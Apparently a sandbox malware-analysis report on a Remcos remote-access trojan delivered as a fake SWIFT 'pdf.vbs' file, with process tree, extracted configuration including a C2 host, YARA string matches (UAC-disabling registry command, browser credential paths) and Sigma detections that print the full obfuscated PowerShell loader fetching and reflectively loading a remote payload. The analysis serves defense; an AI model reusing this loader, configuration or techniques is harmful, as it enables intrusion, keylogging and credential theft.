            • conhost.exe (PID: 1892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 8760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 3236 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 6652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 1412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 5672 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 2504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 6552 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 6452 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
            • chrome.exe (PID: 1276 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 7788 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • svchost.exe (PID: 2076 cmdline: svchost.exe MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chrome.exe (PID: 2928 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
              • chrome.exe (PID: 9232 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1984,i,11069439797262297707,896590743492590315,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6020 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 5636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "ab9001.ddns.net:23782:1", "Assigned name": "OCTOBERS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "VLC.exe", "Startup value": "Rmc", "Hide file": "Disable", "Mutex": "Chrorne-K04X5E", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x691e0:$a1: Remcos restarted by watchdog!
      • 0x69738:$a3: %02i:%02i:%02i:%03i
      • 0x69abd:$a4: * Remcos v
      0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmpREMCOS_RAT_variantsunknownunknown
      • 0x641e4:$str_a1: C:\Windows\System32\cmd.exe
      • 0x64160:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x64160:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x63610:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x63e48:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6320c:$str_b2: Executing file:
      • 0x64328:$str_b3: GetDirectListeningPort
      • 0x63c08:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x63e30:$str_b7: \update.vbs
      • 0x63234:$str_b9: Downloaded file:
      • 0x63220:$str_b10: Downloading file:
      • 0x632c4:$str_b12: Failed to upload file:
      • 0x642f0:$str_b13: StartForward
      • 0x64310:$str_b14: StopForward
      • 0x63dd8:$str_b15: fso.DeleteFile "
      • 0x63d6c:$str_b16: On Error Resume Next
      • 0x63e08:$str_b17: fso.DeleteFolder "
      • 0x632b4:$str_b18: Uploaded file:
      • 0x63274:$str_b19: Unable to delete:
      • 0x63da0:$str_b20: while fso.FileExists("
      • 0x63749:$str_c0: [Firefox StoredLogins not found]
      0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
      • 0x63100:$s1: \Classes\mscfile\shell\open\command
      • 0x63160:$s1: \Classes\mscfile\shell\open\command
      • 0x63148:$s2: eventvwr.exe
      0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        10.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
          10.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
          • 0x679e0:$a1: Remcos restarted by watchdog!
          • 0x67f38:$a3: %02i:%02i:%02i:%03i
          • 0x682bd:$a4: * Remcos v
          10.2.AddInProcess32.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
          • 0x629e4:$str_a1: C:\Windows\System32\cmd.exe
          • 0x62960:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x62960:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
          • 0x61e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
          • 0x62648:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
          • 0x61a0c:$str_b2: Executing file:
          • 0x62b28:$str_b3: GetDirectListeningPort
          • 0x62408:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
          • 0x62630:$str_b7: \update.vbs
          • 0x61a34:$str_b9: Downloaded file:
          • 0x61a20:$str_b10: Downloading file:
          • 0x61ac4:$str_b12: Failed to upload file:
          • 0x62af0:$str_b13: StartForward
          • 0x62b10:$str_b14: StopForward
          • 0x625d8:$str_b15: fso.DeleteFile "
          • 0x6256c:$str_b16: On Error Resume Next
          • 0x62608:$str_b17: fso.DeleteFolder "
          • 0x61ab4:$str_b18: Uploaded file:
          • 0x61a74:$str_b19: Unable to delete:
          • 0x625a0:$str_b20: while fso.FileExists("
          • 0x61f49:$str_c0: [Firefox StoredLogins not found]
          10.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewerdetects Windows exceutables potentially bypassing UAC using eventvwr.exeditekSHen
          • 0x61900:$s1: \Classes\mscfile\shell\open\command
          • 0x61960:$s1: \Classes\mscfile\shell\open\command
          • 0x61948:$s2: eventvwr.exe
          8.2.powershell.exe.180e9fef678.1.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            Click to see the 11 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Base64 Encoded PowerShell Command Detected
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.
            Sigma detected: Potential PowerShell Command Line Obfuscation
            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJys
            Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.
            Sigma detected: Suspect Svchost Activity
            Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 1988, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: svchost.exe, ProcessId: 6516, ProcessName: svchost.exe
            Sigma detected: WScript or CScript Dropper
            Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", CommandLine|base64offset|contains: M, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs", ProcessId: 3032, ProcessName: wscript.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
